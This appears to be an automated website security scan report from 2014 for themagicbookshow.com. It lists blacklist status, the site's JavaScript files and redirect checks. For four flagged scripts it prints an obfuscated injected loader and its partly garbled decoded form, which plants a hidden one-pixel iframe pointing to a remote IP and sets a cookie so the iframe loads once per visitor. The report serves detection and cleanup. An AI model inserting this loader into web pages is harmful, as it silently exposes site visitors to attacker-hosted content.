Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=themagicbookshow.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://themagicbookshow.com/ | 200 OK Content-Length: 6426 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js | 200 OK Content-Length: 91668 Content-Type: text/javascript | clean |
http://themagicbookshow.com/images/rotate/fadeslideshow.js | 200 OK Content-Length: 21922 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e7783887f2e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e7783887f3c8180712e4b2e357682827e483d3d3f3e3f3c3f3f3e3c3f44463c3f3e423d467e5e82565966543c7e767e35491b182e7783887f3c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e7783887f3c8182877a733c707d807273802e4b2e353e35491b182e7783887f3c8182877a733c76 Decoded script: String String function zzzfff() { var iuzq = document.createElement('iframe'); iuzq.src = 'http://101.110.168.104/8pPtHKXF.php'; iuzq.style.position = 'absolute'; iuzq.style.border = '0'; iuzq.style.height = '1px'; iuzq.style.width = '1px'; iuzq.style.left = '1px'; iuzq.style.top = '1px'; if (!document.getElementById('iuzq')) { document.write('<div id=\'iuzq\'></div>'); document.getElementById ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://themagicbookshow.com/images/rotate/slideshowimages.js | 200 OK Content-Length: 9786 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e7783887f2e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e7783887f3c8180712e4b2e357682827e483d3d3f3e3f3c3f3f3e3c3f44463c3f3e423d467e5e82565966543c7e767e35491b182e7783887f3c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e7783887f3c8182877a733c707d807273802e4b2e353e35491b182e7783887f3c8182877a733c76 Decoded script: String String function zzzfff() { var iuzq = document.createElement('iframe'); iuzq.src = 'http://101.110.168.104/8pPtHKXF.php'; iuzq.style.position = 'absolute'; iuzq.style.border = '0'; iuzq.style.height = '1px'; iuzq.style.width = '1px'; iuzq.style.left = '1px'; iuzq.style.top = '1px'; if (!document.getElementById('iuzq')) { document.write('<div id=\'iuzq\'></div>'); document.getElementById ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://themagicbookshow.com/contact/contactform.js | 200 OK Content-Length: 9508 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e7783887f2e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e7783887f3c8180712e4b2e357682827e483d3d3f3e3f3c3f3f3e3c3f44463c3f3e423d467e5e82565966543c7e767e35491b182e7783887f3c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e7783887f3c8182877a733c707d807273802e4b2e353e35491b182e7783887f3c8182877a733c76 Decoded script: String String function zzzfff() { var iuzq = document.createElement('iframe'); iuzq.src = 'http://101.110.168.104/8pPtHKXF.php'; iuzq.style.position = 'absolute'; iuzq.style.border = '0'; iuzq.style.height = '1px'; iuzq.style.width = '1px'; iuzq.style.left = '1px'; iuzq.style.top = '1px'; if (!document.getElementById('iuzq')) { document.write('<div id=\'iuzq\'></div>'); document.getElementById ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://themagicbookshow.com/js/textrotator.js | 200 OK Content-Length: 11714 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e7783887f2e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e7783887f3c8180712e4b2e357682827e483d3d3f3e3f3c3f3f3e3c3f44463c3f3e423d467e5e82565966543c7e767e35491b182e7783887f3c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e7783887f3c8182877a733c707d807273802e4b2e353e35491b182e7783887f3c8182877a733c76 Decoded script: String String function zzzfff() { var iuzq = document.createElement('iframe'); iuzq.src = 'http://101.110.168.104/8pPtHKXF.php'; iuzq.style.position = 'absolute'; iuzq.style.border = '0'; iuzq.style.height = '1px'; iuzq.style.width = '1px'; iuzq.style.left = '1px'; iuzq.style.top = '1px'; if (!document.getElementById('iuzq')) { document.write('<div id=\'iuzq\'></div>'); document.getElementById ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://www.amazingsystem.com/asutils.js | 200 OK Content-Length: 920 Content-Type: application/javascript | clean |
http://www.davidfarr.com/javascript_form/gen_validatorv4.js | 404 Not Found Content-Length: 9712 Content-Type: text/html | clean |
http://www.davidfarr.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://www.davidfarr.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.davidfarr.com/wp-content/themes/optimizePressTheme/lib/js/jquery/jquery.noconflict.min.js?ver=2.2.3 | 200 OK Content-Length: 1142 Content-Type: application/javascript | clean |
http://www.davidfarr.com/wp-content/themes/optimizePressTheme/lib/js/jquery/jquery.loadScript.min.js?ver=2.2.3 | 200 OK Content-Length: 301 Content-Type: application/javascript | clean |
http://www.davidfarr.com/wp-content/plugins/smart-faq/js/smartfaq.min.js?ver=1.2 | 200 OK Content-Length: 346 Content-Type: application/javascript | clean |
http://www.davidfarr.com/wp-content/themes/optimizePressTheme/themes/1/common.min.js?ver=2.2.3 | 200 OK Content-Length: 1494 Content-Type: application/javascript | clean |
http://www.davidfarr.com/wp-content/themes/optimizePressTheme/lib/js/jquery/jquery.placeholder.min.js?ver=2.2.3 | 200 OK Content-Length: 1960 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: themagicbookshow.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 04 Sep 2014 18:56:21 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: themagicbookshow.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 04 Sep 2014 18:56:21 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: themagicbookshow.com
Referer: http://www.google.com/search?q=themagicbookshow.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: themagicbookshow.com
Referer: http://www.google.com/search?q=themagicbookshow.com
Result:
The result is similar to the first query. There are no suspicious redirects found.